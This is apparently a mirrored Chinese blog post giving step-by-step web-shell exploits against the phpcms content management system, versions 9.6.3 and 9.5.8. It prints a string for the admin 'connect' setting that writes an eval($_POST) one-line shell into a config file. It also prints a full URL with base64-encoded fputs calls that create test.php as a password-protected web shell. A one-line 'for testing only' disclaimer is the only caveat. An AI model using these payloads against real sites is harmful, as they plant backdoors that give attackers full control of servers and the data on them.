zoukankan      html  css  js  c++  java
  • phpcms后台getshell

    内容仅供测试使用,请遵守网络安全法

    v9.6.3

    安装完后登陆后台
    http://127.0.0.1/phpcms/index.php?m=admin&c=index&a=login

    后台 - 设置 - connect

    在此处插入 \',@@eval($_POST[123]),//,闭合掉 phpcmscachesconfigssystem.php 这里的 key 参数会将一句话木马写入 system.php 文件。

    访问:

    v9.5.8

    http://localhost/phpcms/index.php?m=content&c=content&a=public_sub_categorys&menuid=${@fputs(fopen(base64_decode(Y2FjaGVzL2NhY2hlc19tb2RlbC9jYWNoZXNfZGF0YS90ZXN0LnBocA==),w),base64_decode(PD9waHAgdmFyX2R1bXAobWQ1KHh6KSk7JGNvbnRlbnQ9c3RyaXBzbGFzaGVzKCRfUE9TVFsxXSk7ZXZhbCgkY29udGVudCk7))}&f=
    

    会生成 /caches/caches_model/caches_data/test.php 一句话
    密码 1

  • 相关阅读:
    普通变量和数组作为函数参数的区别
    2.1
    SQL NULL 值
    SQL ALTER TABLE 语句
    SQL CHECK 约束
    SQL LEFT JOIN 关键字
    SQL JOIN
    SQL Alias(别名)
    SQL 通配符
    从暴力中解脱,
  • 原文地址:https://www.cnblogs.com/sstfy/p/12147032.html
Copyright © 2011-2022 走看看